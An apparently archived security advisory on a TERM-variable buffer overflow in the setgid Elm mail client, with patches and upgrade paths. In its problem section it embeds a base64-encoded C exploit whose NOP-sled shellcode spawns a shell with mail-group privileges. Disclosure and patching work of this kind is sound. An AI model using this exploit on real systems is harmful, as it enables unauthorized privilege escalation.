COMMAND

    Elm

SYSTEMS AFFECTED

    Linux

PROBLEM

    Wojciech Swieboda found an  overflow vulnerability in Elm  (Elm is
    setgid mail on linux, and perhaps on some other platforms aswell).
    This was  tested on  versions 2.3  and 2.4,  on 3  different Linux
    installations and ELM-ME+.

    John   Goerzen   has   confirmed   that   the    recently-reported
    vulnerability in Elm is also  present in Elm-ME+ and thus  also in
    Debian  GNU/Linux  version  1.2,   prerelease  version  1.3,   and
    development tree "unstable".

    Lame exploit for linux included below (works from time to time):

Message-ID: <863658407@random-pc>
Mime-Version: 1.0
Subject: Elm exploit
Content-Type: multipart/mixed; boundary="-"

This is a MIME-Encoded message, created by ESS-Code.  It can be decoded
with MUNPACK, ESS-Code, or any other MIME-Capable software package.  MUNPACK
is available VIA anonymous FTP on ftp.andrew.cmu.edu in the pub/mpack/
directory.
---
Content-Type: application/octet-stream; name="blah.c"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="blah.c"
Content-MD5: Hhsg4YxHkJdsW2U1Z8heqA==

bWFpbigpe3B1dGVudigiVEVSTT0gICAgIFRoZSByZXN0IGlzIHRoZSBtYWRuZXNzIG9mIGFy
dC4gICAgICAgIMT5/78iKTtwdXRlbnYoIkVHRz2QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJDrH16JdggxwIhGB4lGDLALifONTgiNVgzN
gDHbidhAzYDo3P///y9iaW4vc2giKTtleGVjbCgiL3Vzci9iaW4vZWxtIiwiZWxtIiwoY2hh
ciAqKTApO30K

-----

SOLUTION

    From Elm 2.3's curses.c:

    [...]
        char termname[40];
        char *strcpy(), *getenv();

        if (getenv("TERM") == NULL) return(-1);

        if (strcpy(termname, getenv("TERM")) == NULL)
                return(-1);
    [...]

    To patch, change the strcpy line to

        if (strncpy(termname, getenv("TERM"), sizeof(termname)) == NULL)

    To patch it on Elm 2.4, change:

    [...]
        if (strcpy(termname, termenv) == NULL)
                return (-1);

    to:

    [...]
        if (strncpy(termname, termenv, sizeof(termname)) == NULL)
                return (-1);

    Debian GNU/Linux  1.2.x uses  stock Elm  2.4pl25.   Users of  that
    version  of  Elm  should  upgrade  to  Elm-ME+  as detailed below.
    Debian 1.3 (currently in prerelease) will come with Elm-ME+.   You
    should upgrade to the latest Elm-ME+.

    You can download the binary package immediately from:

        ftp://happy.cs.twsu.edu/pub/Debian/binaries/elm-me+_2.4pl25ME+31-5_i386.deb

    Updated source  packages and  diffs are  under /pub/Debian/sources
    on the same server.

    John Goerzen has released  the updated package to  Debian's master
    server, and should show up in distributions shortly.

    --- elm-me+-2.4pl25ME+31.orig/src/curses.c
    +++ elm-me+-2.4pl25ME+31/src/curses.c
    @@ -131,7 +131,7 @@

            if ((termenv = getenv("TERM")) == NULL) return(-1);

    -       if (strcpy(termname, termenv) == NULL)
    +       if (strncpy(termname, termenv, sizeof(termname)) == NULL)
                    return(-1);

            if ((err = tgetent(_terminal, termname)) != 1)

    Fix for Elm 2.4ME+ PL32 (25) available via:

        http://www.ozone.FMI.FI/KEH/elm-2.4ME+32.tar.gz
        http://www.ozone.FMI.FI/KEH/elm-2.4ME+PL32.patch.gz